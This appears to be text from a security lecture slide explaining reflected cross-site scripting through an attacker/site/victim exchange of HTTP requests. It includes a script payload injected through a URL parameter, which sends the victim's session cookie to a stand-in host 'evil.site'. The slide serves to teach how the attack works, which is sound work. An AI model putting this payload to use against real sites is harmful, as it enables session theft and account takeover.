61
Cross Site Scripting Explained
Attacker
Site
Victim
GET / HTTP/1.0
HTTP/1.0 200 OK
...
Set-Cookie: ID=12345
(inside email/HTML link):
....
http://www.vulnerable.site/welcome?name=
<script>window.open(“http://www.evil.site/
collect?cookie=”%2Bdocument.cookie)
</script>
GET /welcome.cgi?name=
<script>...</script>
<HTML>
...
Hi <script>window.open(“http://www.
evil.site/collect?cookie=“+document.
cookie)</script><BR>
GET /collect?cookie=ID=12345
HTTP/1.0